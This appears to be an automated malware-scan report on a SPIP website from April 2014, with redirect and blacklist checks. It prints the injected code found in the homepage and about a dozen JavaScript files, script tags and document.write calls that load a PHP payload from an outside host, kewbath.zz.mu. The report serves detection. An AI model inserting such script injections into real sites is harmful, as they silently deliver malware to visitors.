Scanned pages/files
| Request | Server response | Status |
http://ifs2i-security.com/ | 200 OK Content-Length: 24409 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://kewbath.zz.mu/kRFpJxc6.php?id=172276"></script> | ||
http://ifs2i-security.com/prive/javascript/jquery.js | 200 OK Content-Length: 183320 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://kewbath.zz.mu/kRFpJxc6.php?id=172233"></script>'); | ||
http://ifs2i-security.com/prive/javascript/jquery.form.js | 200 OK Content-Length: 20536 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://kewbath.zz.mu/kRFpJxc6.php?id=172232"></script>'); | ||
http://ifs2i-security.com/prive/javascript/ajaxCallback.js | 200 OK Content-Length: 10951 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://kewbath.zz.mu/kRFpJxc6.php?id=172224"></script>'); | ||
http://ifs2i-security.com/prive/javascript/jquery.cookie.js | 200 OK Content-Length: 4382 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://kewbath.zz.mu/kRFpJxc6.php?id=172231"></script>'); | ||
http://ifs2i-security.com/extensions/porte_plume/javascript/xregexp-min.js | 200 OK Content-Length: 7085 Content-Type: application/javascript | clean |
http://ifs2i-security.com/extensions/porte_plume/javascript/jquery.markitup_pour_spip.js | 200 OK Content-Length: 22302 Content-Type: application/javascript | clean |
http://ifs2i-security.com/extensions/porte_plume/javascript/jquery.previsu_spip.js | 200 OK Content-Length: 2598 Content-Type: application/javascript | clean |
http://ifs2i-security.com/spip.php?page=porte_plume_start.js&lang=en | 200 OK Content-Length: 11944 Content-Type: text/javascript | clean |
http://ifs2i-security.com/squelettes/lightbox/lightbox.js | 200 OK Content-Length: 5789 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://kewbath.zz.mu/kRFpJxc6.php?id=172303"></script>'); | ||
http://ifs2i-security.com/squelettes/js/respond.min.js | 200 OK Content-Length: 3701 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://kewbath.zz.mu/kRFpJxc6.php?id=172300"></script>'); | ||
http://ifs2i-security.com/squelettes/js/jquery-1.5.min.js | 200 OK Content-Length: 84537 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://kewbath.zz.mu/kRFpJxc6.php?id=172293"></script>'); | ||
http://ifs2i-security.com/squelettes/js/modernizr-1.6.min.js | 200 OK Content-Length: 9754 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://kewbath.zz.mu/kRFpJxc6.php?id=172297"></script>'); | ||
http://ifs2i-security.com/squelettes/js/jquery.hoverIntent.minified.js | 200 OK Content-Length: 1742 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://kewbath.zz.mu/kRFpJxc6.php?id=172294"></script>'); | ||
http://ifs2i-security.com/squelettes/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 9825 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://kewbath.zz.mu/kRFpJxc6.php?id=172295"></script>'); | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ifs2i-security.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Apr 2014 12:02:10 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Last-Modified: Wed, 23 Apr 2014 12:02:10 GMT
Composed-By: SPIP 2.1.12 @ www.spip.net + images(1.0.1), msie_compat(1.0.0), porte_plume(1.7.8), safehtml(1.3.7), vertebres(1.0.0), cfg(1.16.0), crayons(1.6.2), googleanalytics(0.3.1), metas(1.3.1), pdk(1.4.0), spip_bonux(2.3.0), voltaire(1.4.0), compositions(2.1.6), feedback(1.3.0), compresseur(1.0.1)
X-Spip-Cache: 86400
GET / HTTP/1.1
Host: ifs2i-security.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Apr 2014 12:02:10 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Last-Modified: Wed, 23 Apr 2014 12:02:10 GMT
Composed-By: SPIP 2.1.12 @ www.spip.net + images(1.0.1), msie_compat(1.0.0), porte_plume(1.7.8), safehtml(1.3.7), vertebres(1.0.0), cfg(1.16.0), crayons(1.6.2), googleanalytics(0.3.1), metas(1.3.1), pdk(1.4.0), spip_bonux(2.3.0), voltaire(1.4.0), compositions(2.1.6), feedback(1.3.0), compresseur(1.0.1)
X-Spip-Cache: 86400
Second query (visit from search engine):
GET / HTTP/1.1
Host: ifs2i-security.com
Referer: http://www.google.com/search?q=ifs2i-security.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ifs2i-security.com
Referer: http://www.google.com/search?q=ifs2i-security.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ifs2i-security.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ifs2i-security.com/
Result: ifs2i-security.com is not infected or malware details are not published yet.
Result: ifs2i-security.com is not infected or malware details are not published yet.